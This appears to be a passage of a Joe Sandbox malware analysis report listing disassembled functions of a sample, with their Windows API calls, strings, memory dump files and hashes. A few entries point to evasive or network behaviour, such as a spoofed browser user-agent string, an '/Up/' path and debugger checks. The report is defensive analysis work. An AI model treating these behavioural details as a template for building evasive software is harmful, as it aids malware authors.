                                                                                                                                                                                                  • Part of subcall function 0014E19F: __EH_prolog3.LIBCMT ref: 0014E1A6
                                                                                                                                                                                                  • Part of subcall function 0014A2AA: __EH_prolog3.LIBCMT ref: 0014A2B1
                                                                                                                                                                                                  • Part of subcall function 00159206: __EH_prolog3_GS.LIBCMT ref: 00159210
                                                                                                                                                                                                  • Part of subcall function 00159C00: __EH_prolog3_catch.LIBCMT ref: 00159C07
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,0018F49C,?,?,?), ref: 00158FAF
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00158FB6
                                                                                                                                                                                                  • Part of subcall function 0014A568: __EH_prolog3_GS.LIBCMT ref: 0014A56F
                                                                                                                                                                                                  • Part of subcall function 00146308: __EH_prolog3_GS.LIBCMT ref: 00146312
                                                                                                                                                                                                  • Part of subcall function 00146308: GetTempPathA.KERNEL32(00000104,?,0000013C), ref: 0014632A
                                                                                                                                                                                                  • Part of subcall function 00156884: __EH_prolog3.LIBCMT ref: 0015688B
                                                                                                                                                                                                  • Part of subcall function 00146671: __EH_prolog3_GS.LIBCMT ref: 0014667B
                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,0018F3A0), ref: 001590F3
                                                                                                                                                                                                  • Part of subcall function 00146671: OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00146893
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • (, xrefs: 0015914D
                                                                                                                                                                                                • Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603, xrefs: 00159002
                                                                                                                                                                                                • /Up/, xrefs: 0015909B, 00159113
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_$H_prolog3$Heap$DebugFreeH_prolog3_catchOutputPathProcessSleepStringTemp
                                                                                                                                                                                                • String ID: ($/Up/$Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                                                                                                • API String ID: 3833634691-864039517
                                                                                                                                                                                                • Opcode ID: 65d2456872c111c5bbdd2045de260951dc3d878185583c4072c45fe03ef1bd8d
                                                                                                                                                                                                • Instruction ID: 01246874923ca8f60f834256328ad478964bc5594ede9cf7aa66f13c38db1c63
                                                                                                                                                                                                • Opcode Fuzzy Hash: 65d2456872c111c5bbdd2045de260951dc3d878185583c4072c45fe03ef1bd8d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7152AF31D04248EADB15EBA8C885BDDBBB4AF25300F5441E9E145BB1A2DF745F88CF62
                                                                                                                                                                                                Function 0017C03A Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: __floor_pentium4
                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                • API String ID: 4168288129-2761157908
                                                                                                                                                                                                • Opcode ID: fad8626856dc6bb69b29ac779d622fd5fca5e3c0bf59b7dab0395e9d38f5e016
                                                                                                                                                                                                • Instruction ID: 14eba498e0c7412f92146fedb40343f882b6cd74ca15620038acf2dc94a303b6
                                                                                                                                                                                                • Opcode Fuzzy Hash: fad8626856dc6bb69b29ac779d622fd5fca5e3c0bf59b7dab0395e9d38f5e016
                                                                                                                                                                                                • Instruction Fuzzy Hash: 73D23A71E086298FDB65CE28DD407EAB7B5FB54305F1481EAD44DE7240EB78AE818F81
                                                                                                                                                                                                Function 001793A9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00179442
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0017946B
                                                                                                                                                                                                • GetACP.KERNEL32 ref: 00179480
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                                                                • Opcode ID: f144e3abeab517ce762d7f02dc4fe219702648694b85c5b6e2765d72d795b810
                                                                                                                                                                                                • Instruction ID: 0770a2bce3074ed400cc832729f7024f908f234110663d667ca8c1618733fd10
                                                                                                                                                                                                • Opcode Fuzzy Hash: f144e3abeab517ce762d7f02dc4fe219702648694b85c5b6e2765d72d795b810
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F21C272A04100A6EB348F65CA44A9B73B6FB94B60B16C464E90FDB251E732DE4AC350
                                                                                                                                                                                                Function 00179585 Relevance: 7.7, APIs: 5, Instructions: 182COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
                                                                                                                                                                                                  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
                                                                                                                                                                                                • GetUserDefaultLCID.KERNEL32 ref: 0017968D
                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 001796CB
                                                                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 001796DE
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00179726
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00179741
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 415426439-0
                                                                                                                                                                                                • Opcode ID: 97dc36530a4b49ca9fc7aa279afa366cc9aa056bce1a80a81cdc3655ff3d8e49
                                                                                                                                                                                                • Instruction ID: 1c37b9ed2ea1605bbdfc6d466332cf3cbd3edfaefa9986ca664670479b28eee9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 97dc36530a4b49ca9fc7aa279afa366cc9aa056bce1a80a81cdc3655ff3d8e49
                                                                                                                                                                                                • Instruction Fuzzy Hash: 40519171A00215AFDB14EFA5CC45ABE77BCBF54700F04856AF518EB191EB709A48CB61
                                                                                                                                                                                                Function 00168960 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: b54f330be523bf74fb6e165f179a1ee627a2c41003d33122c132f8584647ece6
                                                                                                                                                                                                • Instruction ID: 4fe2bc52e9e16e4ac3a4682b659fb51f24bd6de288f27e601b32af8b275b53d4
                                                                                                                                                                                                • Opcode Fuzzy Hash: b54f330be523bf74fb6e165f179a1ee627a2c41003d33122c132f8584647ece6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 99022C71E012199BDF14CFA9CD906AEFBB1FF48314F258269D919E7380DB31A952CB90
                                                                                                                                                                                                Function 0015D3D0 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0015D3DC
                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0015D4A8
                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0015D4C1
                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0015D4CB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                                • Opcode ID: 3d1fcfa80b41c396e9b9d0f72bba604c2520f88631db0e69a08660403e288310
                                                                                                                                                                                                • Instruction ID: dbdf7aca5fa9ce5adf8eb4b1184713df41e0de4e1278311d371d8282eb31b09c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d1fcfa80b41c396e9b9d0f72bba604c2520f88631db0e69a08660403e288310
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8431F975D05218DBDF21EF64D9897CDBBB8AF18305F1041AAE40DAB250E7709B84CF45
                                                                                                                                                                                                Function 00179020 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
                                                                                                                                                                                                  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00179074
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001790BE
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00179184
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 661929714-0
                                                                                                                                                                                                • Opcode ID: 4ad7840acaeb8e21cc7151165b9e0958c0fd74479a8d55eac3229b19dd5f9a95
                                                                                                                                                                                                • Instruction ID: 7d4050db6f1bb998a52af062a5cbf0e98e24f879a299c70c22b90b97267a96e0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ad7840acaeb8e21cc7151165b9e0958c0fd74479a8d55eac3229b19dd5f9a95
                                                                                                                                                                                                • Instruction Fuzzy Hash: 20619771500107AFDB28DF28CD86BB677B8FF54310F2481B5E919D6682E734D999CB50
                                                                                                                                                                                                Function 0016B6EC Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0016B7E4
                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0016B7EE
                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 0016B7FB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                • Opcode ID: 324af2b0fa8fd6a9685db4c2ddee52b785117efd04988e0e4498510e5360fdfb
                                                                                                                                                                                                • Instruction ID: 9ca040c3c819e902b4af8af56009f72ff907a919e49c8194df8b528fbc62f945
                                                                                                                                                                                                • Opcode Fuzzy Hash: 324af2b0fa8fd6a9685db4c2ddee52b785117efd04988e0e4498510e5360fdfb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4731D2749012289BCB21DF28DC89B8DBBB8BF18311F5041EAE81CAB250E7709BC58F44
                                                                                                                                                                                                Function 00164EC6 Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,001452B9,00000000), ref: 00164EDB
                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00164EFA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1518329722-0
                                                                                                                                                                                                • Opcode ID: bd0b3e89e07eeca9b8f9fb4a13a6cd81f90b5b0d36740afad4632764d8e15964
                                                                                                                                                                                                • Instruction ID: 8fb3240bd93fd3a15bd5d70a9dde052914875bac485591bc4d59d1f1e393551f
                                                                                                                                                                                                • Opcode Fuzzy Hash: bd0b3e89e07eeca9b8f9fb4a13a6cd81f90b5b0d36740afad4632764d8e15964
                                                                                                                                                                                                • Instruction Fuzzy Hash: C9F0F4B2A002147B4724DF6D8D0489EBEE9EFCA7717258299F809D7340E670CE01C790
                                                                                                                                                                                                Function 00172B10 Relevance: 1.9, APIs: 1, Instructions: 410timeCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00172F55,00000000,00000000,00000000), ref: 00172E14
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InformationTimeZone
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 565725191-0
                                                                                                                                                                                                • Opcode ID: bea8216935bbd372777b7f29bbd0e67a97f2fde59cd6f7e6b2a159581f4fcef3
                                                                                                                                                                                                • Instruction ID: c11caf4b2a78815b8a534f5e13617815d0242cb75c26fe3fb24846c1b2f7f53a
                                                                                                                                                                                                • Opcode Fuzzy Hash: bea8216935bbd372777b7f29bbd0e67a97f2fde59cd6f7e6b2a159581f4fcef3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 73D11972E00115ABDB21AFA5DC02ABE77B9EF24710F64C056F949EB291E7709E42C790
                                                                                                                                                                                                Function 0017AA6E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0017AA69,?,?,00000008,?,?,0017FA4F,00000000), ref: 0017AC9B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                                • Opcode ID: 9452d8c0b9a02e82a2e67604cf59dbda271b059ca0c97697c2a31e55dabbeb7f
                                                                                                                                                                                                • Instruction ID: 4eed5430edf566f05181ba5673944e1e4b8e9093c1cc2d1a393388c7537b52ed
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9452d8c0b9a02e82a2e67604cf59dbda271b059ca0c97697c2a31e55dabbeb7f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EB129316106089FD719CF28C48AB697BF1FF85365F69C658E89ACF2A1C335E981CB41
                                                                                                                                                                                                Function 0015D1DF Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0015D1F5
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                                                                                • Opcode ID: 8fc0cb894142346a8d5fe459a33ccbb8dbee19af4b59cf90300ade098051c6e9
                                                                                                                                                                                                • Instruction ID: d7d4cc24158a388061dd2bc00dd149f809add6cb7aa8a082d88ce691186240b2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fc0cb894142346a8d5fe459a33ccbb8dbee19af4b59cf90300ade098051c6e9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 15516DB1A01205CBEB24CF59E9817AAB7F4FB48301F24846AD811EB660D7759984CB91
                                                                                                                                                                                                Function 0016AE84 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                • Opcode ID: ce893491e046467159ee0688c2eb3326e073de00430873c4ae9dfa811fb9772f
                                                                                                                                                                                                • Instruction ID: 6f661b0f4e369ab81bc7aab834b0d99f0e6bb36fcd1a8c3fb156489f1a5db3a7
                                                                                                                                                                                                • Opcode Fuzzy Hash: ce893491e046467159ee0688c2eb3326e073de00430873c4ae9dfa811fb9772f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 31C111709086068ECB28DF2CCDE4A7EBBB1EF06300F540659E452E7691D331ADA5CF52
                                                                                                                                                                                                Function 00179280 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
                                                                                                                                                                                                  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001792D4
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3736152602-0
                                                                                                                                                                                                • Opcode ID: 411673be6726d6bd8ba279506978552b68b8510e011fdc6cc884cc918d608d09
                                                                                                                                                                                                • Instruction ID: 8d584d74c5ce6e19c1dd6457787eb5207f59f89be5e6aed4117878c87424a7e0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 411673be6726d6bd8ba279506978552b68b8510e011fdc6cc884cc918d608d09
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7521C532A10206ABEF189A29DC45ABA73BCFF55314F14807AFD09D7281EB34ED48C750
